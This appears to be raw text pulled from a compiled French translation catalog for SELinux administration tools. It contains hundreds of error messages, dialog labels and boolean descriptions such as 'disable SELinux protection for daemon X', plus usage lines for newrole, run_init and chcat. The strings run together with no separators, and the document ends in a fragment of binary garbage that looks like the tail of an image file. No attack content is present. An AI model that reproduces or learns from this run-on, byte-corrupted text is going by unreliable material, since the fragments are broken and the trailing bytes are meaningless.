Copyright (c) 2006 Dan Walsh <dwalsh@redhat.com>Impossible d'ajouter l'identité SELinux %sImpossible d'ajouter l'adresse %sImpossible d'ajouter le contexte du fichier pour %sImpossible d'ajouter l'interface %sImpossible d'ajouter un mappage pour %sImpossible d'ajouter le port %s/%sImpossible d'ajouter le préfixe %s à  %sImpossible d'ajouter un rôle %s pour %sImpossible de vérifier si l'identité SELinux %s est définieImpossible de vérifier si l'adresse %s est définieImpossible de vérifier si le booléen %s est définiImpossible de vérifier si le contexte du fichier pour %s est définiImpossible de vérifier si l'interface %s existeNe peut vérifier si le mappage de connexion est défini pour %sImpossible de vérifier si le port %s/%s est définiImpossible de fermer les descripteurs.
Impossible de commiter une transaction semanageImpossible de créer une identité SELinux pour %sImpossible de créer une clef pour %sImpossible de créer une clef pour %s/%sImpossible de créer une adresse pour %sImpossible de créer le contexte pour %sImpossible de créer le contexte pour %s/%sImpossible de créer le contexte du fichier pour %sImpossible de créer l'interface pour %sImpossible de créer la clef pour %sNe peut mapper le nom d'utilisateur pour %sImpossible de créer le port pour %s/%sImpossible de créer un outil semanageImpossible de supprimer l'identité SELinux %sImpossible de supprimer l'adresse %sImpossible de supprimer le booléen %sImpossible de supprimer le contexte du fichier pour %sImpossible de supprimer l'interface %sImpossible de supprimer la correspondance utilisateurs - identités SELinux pour %sImpossible de supprimer le port %s/%sImpossible de supprimer le contexte du fichier pour %sImpossible de supppimer le port %sNe peut définir le mode autoritaire.
Impossible d'établir de connexion semanageImpossible d'extraire la clef pour %sImpossible de lister les modules SELinuxImpossible de lister les identités SELinuxImpossible d'énumérer les adressesImpossible d'énumérer les booléensImpossible de lister les contextes de fichiersImpossible d'énumérer les interfacesImpossible de lister les contextes de fichiers locauxImpossible de lister les mappagesImpossible d'énumérer les portsImpossible de lister les rôles de l'utilisateur %sImpossible d'énumérer les contextes de fichiersImpossible d'énumérer les portsImpossible de modifier l'identité SELinux %sImpossible de modifier l'adresse %sImpossible de modifier les booléens %sImpossible de modifier le contexte du fichier pour %sImpossible de modifier l'interface %sImpossible de modifier le mappage pour %sImpossible de modifier le port %s/%sImpossible d'ouvrir le fichier %s
Impossible d'interroger l'adresse %sImpossible d'interroger le contexte du fichier %sImpossible d'interroger le contexte du fichier pour %sImpossible d'interroger l'interface %sImpossible d'interroger le port %s/%sImpossible d'interroger le seuser pour %sImpossible d'interroger l'utilisateur pour %sImpossible de supprimer le domaine permissif %s (échec de la suppression)Impossible de régler le niveau MLS pour %sImpossible de définir une plage MLS pour %sImpossible de définir une identité SELinux pour %sImpossible de définir une valeur active du booléen %sImpossible de définir le contexte de l'adresse pour %sImpossible de régler le contexte d'exécution vers %s.
Impossible de définir le contexte du fichier %sImpossible de définir le contexte d'interface pour %sImpossible de définir le masque pour %sImpossible de définir le contexte du message pour %sImpossible de définir les champs MLS dans le contexte de l'adresse pour %sImpossible de définir les champs MLS dans le contexte du fichier pour %sImpossible de définir les champs MLS dans le contexte d'interface pour %sImpossible de définir les champs MLS dans le contexte du port pour %s/%sImpossible de définir le nom pour %sImpossible de définir le domaine permissif %s (échec de l'installation du module)Impossible de définir le contexte du port pour %s/%sImpossible de définir le rôle dans le contexte de l'adresse pour %sImpossible de définir le rôle dans le contexte du fichier pour %sImpossible de définir le rôle dans le contexte d'interface pour %sImpossible de définir le rôle dans le contexte du port pour %s/%sImpossible de définir le type dans le contexte de l'adresse pour %sImpossible de définir le type dans le contexte du fichier pour %sImpossible de définir le type dans le contexte d'interface pour %sImpossible de définir le type dans le contexte du port pour %s/%sImpossible de définir l'utilisateur dans le contexte de l'adresse pour %sImpossible de définir l'utilisateur dans le contexte du fichier pour %sImpossible de définir l'utilisateur dans le contexte d'interface pour %sImpossible de définir l'utilisateur dans le contexte du port pour %s/%sImpossible de démarrer une transaction semanageImpossible de tester les statuts MLS activésImpossible de trouver le type par défaut.
Créer/manipuler des fichiers temporaires dans /tmpCronMode de protection en vigueurPersonnaliséDémon système DBUSBases de donnéesSupprimer %sSupprimer un contexte du fichierSupprimer un port réseauSupprimer une correspondance utilisateurs - identités SELinuxSupprimer un utilisateurDescriptionDésactiver l'auditDésactiver la protection SELinux pour le serveur ClusterDésactiver la protection SELinux pour EvolutionDésactiver la protection SELinux pour le démon halDésactiver la protection SELinux pour le démon NIS PasswordDésactiver la protection SELinux pour le démon NIS TransferDésactiver la protection SELinux pour NetworkManagerDésactiver la protection SELinux pour ThunderbirdDésactiver la protection SELinux pour le démon « acct »Désactiver la protection SELinux pour amandaDésactiver la protection SELinux pour amavisDésactiver la protection SELinux pour le démon apmdDésactiver la protection SELinux pour le démon arpwatchDésactiver la protection SELinux pour le démon auditdDésactiver la protection SELinux pour le démon automountDésactiver la protection SELinux pour avahiDésactiver la protection SELinux pour le démon bluetoothDésactiver la protection SELinux pour le démon cannaDésactiver la protection SELinux pour le démon cardmgrDésactiver la protection SELinux pour le démon cipedDésactiver la protection SELinux pour le démon clamdDésactiver la protection SELinux pour clamscanDésactiver la protection SELinux pour clvmdDésactiver la protection SELinux pour démon comsatDésactiver la protection SELinux pour le démon courierDésactiver la protection SELinux pour le démon cpucontrolDésactiver la protection SELinux pour le démon cpuspeedDésactiver la protection SELinux pour le démon crondDésactiver la protection SELinux pour le démon cups hplipDésactiver la protection SELinux pour le serveur cupsdDésactiver la protection SELinux pour le démon cupsdDésactiver la protection SELinux pour cupsd_lpdDésactiver la protection SELinux pour le démon CVSDésactiver la protection SELinux pour le démon cyrusDésactiver la protection SELinux pour le démon dbskkdDésactiver la protection SELinux pour le démon dbusdDésactiver la protection SELinux pour dccdDésactiver la protection SELinux pour dccifdDésactiver la protection SELinux pour dccmDésactiver la protection SELinux pour le démon ddtDésactiver la protection SELinux pour le démon devfsdDésactiver la protection SELinux pour le démon dhcpcDésactiver la protection SELinux pour le démon dhcpdDésactiver la protection SELinux pour le démon dictdDésactiver la protection SELinux pour le démon distccdDésactiver la protection SELinux pour le démon dmesgDésactiver la protection SELinux pour le démon dnsmasqDésactiver la protection SELinux pour le démon dovecotDésactiver la protection SELinux pour le démon entropydDésactiver la protection SELinux pour fetchmailDésactiver la protection SELinux pour le démon fingerdDésactiver la protection SELinux pour le démon freshclamDésactiver la protection SELinux pour le démon fsdaemonDésactiver la protection SELinux pour gamesDésactiver la protection SELinux pour le démon gpmDésactiver la protection SELinux pour le démon gssDésactiver la protection SELinux pour le démon hostnameDésactiver la protection SELinux pour le démon hotplugDésactiver la protection SELinux pour le démon howlDésactiver la protection SELinux pour http suexecDésactiver la protection SELinux pour httpd rotatelogsDésactiver la protection SELinux pour le démon hwclockDésactiver la protection SELinux pour le démon i18nDésactiver la protection SELinux pour le démon imazesrvDésactiver la protection SELinux pour les démons inetd childDésactiver la protection SELinux pour le démon inetdDésactiver la protection SELinux pour le démon inndDésactiver la protection SELinux pour le démon iptablesDésactiver la protection SELinux pour le démon ircdDésactiver la protection SELinux pour le démon irqbalanceDésactiver la protection SELinux pour le démon iscsiDésactiver la protection SELinux pour le démon jabberdDésactiver la protection SELinux pour le démon kadmindDésactiver la protection SELinux pour le démon klogdDésactiver la protection SELinux pour le démon krb5kdcDésactiver la protection SELinux pour le démon ktalkDésactiver la protection SELinux pour le démon kudzuDésactiver la protection SELinux pour le démon locateDésactiver la protection SELinux pour le démon lpdDésactiver la protection SELinux pour le démon lrrdDésactiver la protection SELinux pour le démon lvmDésactiver la protection SELinux pour mailmanDésactiver la protection SELinux pour le démon mdadmDésactiver la protection SELinux pour le démon monopdDésactiver la protection SELinux pour le démon mrtgDésactiver la protection SELinux pour le démon mysqldDésactiver la protection SELinux pour le démon nagiosDésactiver la protection SELinux pour le démon namedDésactiver la protection SELinux pour le démon nessusdDésactiver la protection SELinux pour le démon nfsdDésactiver la protection SELinux pour le démon nmbdDésactiver la protection SELinux pour le démon nrpeDésactiver la protection SELinux pour le démon nscdDésactiver la protection SELinux pour le démon nsdDésactiver la protection SELinux pour le démon ntpdDésactiver la protection SELinux pour oddjobDésactiver la protection SELinux pour oddjob_mkhomedirDésactiver la protection SELinux pour le démon openvpnDésactiver la protection SELinux pour le démon pamDésactiver la protection SELinux pour pegasusDésactiver la protection SELinux pour le démon perditionDésactiver la protection SELinux pour le démon portmapDésactiver la protection SELinux pour le démon portslaveDésactiver la protection SELinux pour postfixDésactiver la protection SELinux pour le démon postgresqlDésactiver la protection SELinux pour pptpDésactiver la protection SELinux pour le démon prelinkDésactiver la protection SELinux pour le démon privoxyDésactiver la protection SELinux pour le démon ptalDésactiver la protection SELinux pour le démon pxeDésactiver la protection SELinux pour pyzordDésactiver la protection SELinux pour le démon quotaDésactiver la protection SELinux pour le démon radiusdDésactiver la protection SELinux pour le démon radvdDésactiver la protection SELinux pour rdiscDésactiver la protection SELinux pour readaheadDésactiver la protection SELinux pour restorecondDésactiver la protection SELinux pour le démon rhgbDésactiver la protection SELinux pour ricciDésactiver la protection SELinux pour ricci_modclusterdDésactiver la protection SELinux pour le démon rlogindDésactiver la protection SELinux pour le démon rpcdDésactiver la protection SELinux pour rshdDésactiver la protection SELinux pour le démon rsyncDésactiver la protection SELinux pour le démon saslauthdDésactiver la protection SELinux pour le démon scannerdaemonDésactiver la protection SELinux pour le démon sendmailDésactiver la protection SELinux pour setransDésactiver la protection SELinux pour le démon setroubleshootDésactiver la protection SELinux pour le démon slapdDésactiver la protection SELinux pour le démon slrnpullDésactiver la protection SELinux pour le démon smbdDésactiver la protection SELinux pour le démon snmpdDésactiver la protection SELinux pour le démon snortDésactiver la protection SELinux pour le démon soundDésactiver la protection SELinux pour le démon sounddDésactiver la protection SELinux pour le démon spamdDésactiver la protection SELinux pour le démon speedmgmtDésactiver la protection SELinux pour le démon squidDésactiver la protection SELinux pour le démon sshDésactiver la protection SELinux pour le démon stunnelDésactiver la protection SELinux pour le démon swatDésactiver la protection SELinux pour le démon sxidDésactiver la protection SELinux pour le démon syslogdDésactiver la protection SELinux pour les travaux système cronDésactiver la protection SELinux pour le démon tcpDésactiver la protection SELinux pour le démon telnetDésactiver la protection SELinux pour le démon tftpdDésactiver la protection SELinux pour web browsersDésactiver la protection SELinux pour le démon transproxyDésactiver la protection SELinux pour le démon udevDésactiver la protection SELinux pour le démon umlDésactiver la protection SELinux pour le démon updfstabDésactiver la protection SELinux pour le démon uptimedDésactiver la protection SELinux pour le démon uucpdDésactiver la protection SELinux pour le démon vmwareDésactiver la protection SELinux pour le démon watchdogDésactiver la protection SELinux pour le démon winbindDésactiver la protection SELinux pour le démon xdmDésactiver la protection SELinux pour xen controlDésactiver la protection SELinux pour le démon xenDésactiver la protection SELinux pour le démon xfsDésactiver la protection SELinux pour le démon ypbindDésactiver la protection SELinux pour le démon ypservDésactivéDésactivé
Permissif
Appliqué
Interdire à tout processus de charger des modules noyauInterdire à tout processus de modifier la stratégie SELinux du noyauInterdire la transition vers sysadmin_t, effectuée par sudo et suNe pas auditer les éléments défectueux qui ne constituent pas un risque en terme de sécuritéÉditer un port réseauActiver l'auditActiver/désactiver les règles supplémentaires d'audit, qui ne sont normalement pas reportées dans les fichiers journaux.StrictEntrez le chemin d'accès aux exécutables à confiner.Entrez le chemin d'accès complet au script d'initialisation utilisé pour démarrer le programme confiné.Entrer un nom de type unique pour le modèle d'utilisateur ou de programme à confiner.Erreur d'allocation de mémoire.
Erreur d'allocation pour argv0 du shell.
Erreur lors de la modification de l'UID, abandon.
Erreur de connexion au système d'audit.
Erreur lors de la libération du SETUID, abandon
Erreur lors de la libération des capacités, abandon
Erreur lors de la libération de caps
Erreur lors de l'initialisation des capacités, abandon.
Erreur de ré-initialisation de KEEPCAPS, abandon
Erreur lors de l'envoi du message d'audit.
Erreur de la configuration de KEEPCAPS, abandon
Erreur lors de la configuration des capacités, abandon
Erreur ! Impossible d'ouvrir %s.
Erreur ! Shell non valide.
Erreur : niveaux multiples spécifiés
Erreur : des rôles multiples ont été spécifiés
Erreur : des types multiples ont été spécifiés
Erreur : vous n'êtes pas autorisé à changer de niveau sur un terminal non sûr
ExécutableModèles d'utilisateurs existantUtilisateur existant_Impossible de fermer correctement le terminal
Fichier
SpécificationFichier
TypeFichier de contextes fichierÉtiquetage de fichierSpécification de fichierType de fichierLe contexte du fichier pour %s est défini dans la stratégie, il ne peut être suppriméLe contexte du fichier pour %s n'est pas définiFiltreGPLJeuxGénérer un module pour une nouvelle stratégieAffichage par groupeService HTTPDScript d'initialisationInteragit avec le terminalL'interface %s est définie dans la stratégie, elle ne peut être suppriméeL'interface %s n'est pas définieFichier d'interfaceDémons de services Internet (inetd)Les démons de services Internet sont des démons démarrés par xinetdSpécification de fichier invalideKerberosÉtiquetageLe groupe Linux %s n'existe pasL'utilisateur Linux %s n'existe pasAffichage par listeCharger un module de stratégieCharger un module de stratégieVerrouillage...Utilisateur
NomL'ouverture de session en tant que « %s » est exigéeNom pour l'ouverture de sessionLa correspondance utilisateurs - identités SELinux pour %s est définie dans une stratégie, elle ne peut être suppriméeLe mappage de connexion pour %s n'est pas définiNiveau MCSIntervalle MCSMLSMLS/Plage MLS/
MCSMLS/MCS
NiveauIntervalle MLS/MCSProtection mémoireModèle minimal de terminal utilisateurModèle minimal de serveur X utilisateurModifier %sModifier le contexte du fichierModifier une correspondance utilisateurs - identités SELinuxModifier un utilisateurModifier un enregistrement existant d'ouverture de sessionLe module %s.pp est déjà chargé dans la stratégie.
Voulez-vous continuer?Nom du moduleMonterNFSNISNomService de nomConfiguration réseauPort réseauPas de contexte dans le fichier %s
L'adresse du nœud est requiseLe masque de réseau du nœud est requisPas encore implémentéErreur %s dans les optionsPlus de mémoire disponible !
Mot de passe :PermissifPolgenRépertoire de stratégieModule de stratégiesPortLe port %s/%s est déjà définiLe port %s/%s est défini dans la stratégie, il ne peut être suppriméLe port %s/%s n'est pas définiNuméro de portUn numéro de port nécessaireLe numéro de port « %s » est invalide. 0 < NUMERO_DE_PORT < 65536 Les ports doivent être des nombres ou des plages de nombres compris entre 1 et %d PréfixeImpressionDomaine du processusProtocoleProtocoleProtocole udp ou tcp obligatoireRed Hat 2007Ré-étiquetage au prochain redémarrage.Effacer un module de stratégie chargeableRequiert au moins une catégorieExige un préfixe ou un rôleExige un préfixe, un rôle, un niveau ou une plagesetype obligatoiresetype ou serange obligatoiresetype, serange ou seuser nécessaireseuser ou un serange obligatoireFaire revenir les réglages booléens à ceux du sytéme par défautRôleModèle d'utilisateur rootLancer l'assistant pour les booléens de verrouillageServeur d'authentification SASLSELinux
IdentitéAdministration SELinuxInterface SELinuxOutil de génération de stratégies SELinuxPort SELinux
TypeTypes de port SELinuxRôles SELinuxProtection des services SELinuxType SELinuxType SELinux nécessaireIdentité SELinuxbooléen SELinuxcontexte fichier SELinuxLa stratégie SELinux n'est pas gérée ou la base n'est pas accessible.L'identité SELinux %s est définie dans une stratégie, elle ne peut être suppriméeL'identité SELinux %s n'existe pasL'identité SELinux « %s » est exigéeSSHSambaSélectionnez l'objet de gestionSélectionner des portsSélectionner le rôle d'utilisateur root, si cet utilisateur doit administrer la machine en tant que root. Cet utilisateur ne pourra pas ouvrir de session sur le système directement.Sélectionnez un répertoire dans lequel générer les fichiers de stratégieSélectionnez les répertoires que le programme confiné possède et dans lesquels il écritSélectionner les fichiers exécutables à confiner.Sélectionnez un ou plusieurs fichiers que le programme confiné crée ou dans lesquels il écritSélectionnez si vous souhaitez ré-étiqueter l'intégralité du système de fichiers au prochain démarrage. Le ré-étiquetage peut prendre un temps considérable, qui dépend de la taille de votre système de fichiers. Si vous êtes en train de changer de type de stratégie ou si vous passez de « désactivé » à « strict », un ré-étiquetage est obligatoire.Sélectionnez le script d'initialisation à confiner.Sélectionner les domaines qui doivent être administrés par cet utilisateur.Sélectionnez le modèle d'utilisateur qui va faire la transition aux domaines de cette applicationSELinux
Contexte du fichierTransaction de semanage déjà en coursAucune transaction semanage en coursEnvoie des messages auditEnvoie un courrier électroniqueScript de configurationDésolé, l'option -l doit être utilisée avec le support SELinux MLS.
Désolé, newrole ne peut être utilisé que sur un noyau SELinux.
Désolé, run_init doit être utilisé uniquement sur un noyau SELinux.
Protection anti-spamSquidDémons d'initialisation standardsLes démons d'initialisation standards sont des démons chargés au démarrage par les scripts d'initialisation. Ils requièrent habituellement un script placé dans /etc/init.dÉtatMode de protection par défaut du systèmeType de stratégie par défaut pour le système : Cet utilisateur peut ouvrir une session sur une machine par X ou par un terminal. Par défaut cet utilisateur n'aura pas de propriété setuid, pas de réseautage, pas de commandes sudo et su.Cet utilisateur va ouvrir une session sur une machine seulement par un terminal ou une connexion à distance. Par défaut cet utilisateur n'aura pas de propriété setuid, pas de réseautage, pas de commandes sudo et su.Pour rendre ce paquetage de stratégies actif, exécutez :Basculer entre les booléens personnalisés et tous les booléensBasculer entre les ports personnalisés et tous les portsBasculer entre les contextes de fichier personnalisés et tous les contextes de fichiersTransition de l'identité SELinux « staff » vers le domaine « Web Browser »Transition de l'identité SELinux « sysadm » vers le domaine « Web Browser »Transition de l'identité SELinux « user » vers le domaine « Web Browser »Transition de l'identité SELinux « xguest » vers le domaine « Web Browser »Le type %s_t est déjà défini dans la stratégie.
Voulez-vous continuer?Fichier de types applicablesIndiquez un typeSYNTAXE : run_init <script> <args ...>
  où : <script> est le nom du script d'initialisation à exécuter,
       <args ...> sont les arguments à passer au script.Les types USER obtiennent automatiquement un type tmpImpossible d'allouer de l'espace mémoire pour new_contextImpossible de nettoyer l'environnement
Impossible d'obtenir un ensemble vide de signaux
Impossible de restaurer l'environnement, abandon
Impossible de restaurer l'étiquette du terminal...
Impossible de configurer le gestionnaire SIGHUP
Tunnel SSL universelProtocole inconnu ou manquantPorts non réservés (> 1024)Syntaxe : %s -LSyntaxe : %s -L -l utilisateurSyntaxe : %s -d Fichier...Syntaxe : %s -l -d utilisateur ...Syntaxe : %s -l CATEGORY utilisateurSyntaxe : %s -l [[+|-]CATEGORY],...]q Utilisateur ...Syntaxe : %s CATEGORY FichierSyntaxe : %s [[+|-]CATEGORY],...]q Fichier ...Utilisez -- pour marquer la fin des options. Par exempleProgramme utilisateurUn programme utilisateur correspond à tout programme que vous aimeriez confiner et qui peut être démarré par un utilisateurCorrespondance utilisateurPrivilèges utilisateurModèle d'utilisateurUtilisateur avec un réseautage complet, pas d'application setuid sans transition, pas de commande su, pouvant utiliser la commande sudo pour les tâches administratives réservées au RootUtilisateur avec un réseautage complet, pas de propriété setuid sans transition, pas de commandes sudo et su.Utilise PAM pour l'authentificationUtilise dbusUtilise les appels nsswitch ou getpwVerifiez le nomVersionAttention ! Impossible de récupérer les informations liées au terminal
Attention ! Impossible de restaurer le contexte pour %s
Applications Web / scripts (CGI)Applications WebApplications Web / script (CGI) Scripts SGI démarrés par le serveur web (Apache)Le programme utilise syslog pour journaliser des messages	XENServeur XVous devez ajouter au moins un rôle pour %sVous devez spécifier un exécutableVous devez spécifier un nom pour votre processus/utilisateur confinéVous devez spécifier le chemin d'accès à l'exécutable pour votre processus confinéVous devez sélectionner un utilisateurVous devez spécifier une des valeurs suivantes : %s_Supprimer_Propriétéstouttout fichier
fichier ordinaire
répertoire
périphérique en mode caractères
périphérique en mode block
socket
lien symbolique
tube nommé
échec lors de l'authentification.
impossible de trouver une entrée valide dans le fichier passwd.
chcat -- -CompanyConfidential /docs/businessplan.odtchcat -l +CompanyConfidential jusererreur de lecture de la configuration du service PAM.
échec de construction de la nouvelle plage avec le niveau %s
échec de conversion du contexte en chaîne
échec de l'exécution du shell
impossible d'obtenir les informations du compte.
impossible d'obtenir le nouveau contexte.
impossible de trouver old_context.
échec de l'initialisation de PAM
impossible de définir PAM_TTY
échec de la création de la plage %s
échec de l'affectation du nouveau rôle %s
échec de l'affectation du nouveau type %s
getpass ne peut accéder à  /dev/tty
global(e)étiquette37étiquette38étiquette39étiquette41étiquette42étiquette44étiquette50étiquette59nouveau rôle :  %s :  erreur à la ligne %lu.
newrole : échec de duplication : %snewrole : mot de passe incorrect pour %s
nouveau rôle : débordement de table de hachage pour la configuration du nom de service
ferméouvertpppdrsyncrun_init : mot de passe incorrect pour %s
system-config-selinuxtraducteurstypeinconnusyntaxe :  %s [-q]
« use_syslog » doit avoir une valeur booléenne 
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`